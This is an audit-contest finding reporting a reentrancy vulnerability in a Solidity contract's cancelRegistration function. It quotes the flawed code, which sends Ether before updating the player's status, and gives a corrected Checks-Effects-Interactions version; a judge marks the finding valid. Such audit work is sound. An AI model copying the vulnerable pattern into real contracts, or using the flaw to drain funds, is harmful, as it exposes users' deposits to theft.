First Flight #20: The Predicter
First Flight #20
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Reentrancy Vulnerability in cancelRegistration Function Lead to stealing all the Funds by a malicous User

chaossr

Summary

The cancelRegistration function in the ThePredicter contract is vulnerable to reentrancy attacks due to the improper ordering of operations. The function does not follow the Checks-Effects-Interactions (CEI) pattern, potentially allowing an attacker to drain the contract's funds.

Vulnerability Details

The vulnerable function is:

function cancelRegistration() public {
if (playersStatus[msg.sender] == Status.Pending) {
(bool success, ) = msg.sender.call{value: entranceFee}("");
require(success, "Failed to withdraw");
playersStatus[msg.sender] = Status.Canceled;
return;
}
revert ThePredicter__NotEligibleForWithdraw();
}

The vulnerability arises because the function:

1 . Checks the player's status

2 . Sends Ether to the player

3 . Updates the player's status

This order of operations violates the CEI pattern, allowing for a potential reentrancy attack.

Impact

An attacker could exploit this vulnerability to drain the contract of more Ether than they are entitled to.

Tools Used

Manual code review

Recommendations

Implement the Checks-Effects-Interactions pattern:

function cancelRegistration() public {
if (playersStatus[msg.sender] != Status.Pending) {
revert ThePredicter__NotEligibleForWithdraw();
}
playersStatus[msg.sender] = Status.Canceled;
(bool success, ) = msg.sender.call{value: entranceFee}("");
require(success, "Failed to withdraw");
}
Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Reentrancy in cancelRegistration

Reentrancy of ThePredicter::cancelRegistration allows a maliciour user to drain all funds.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.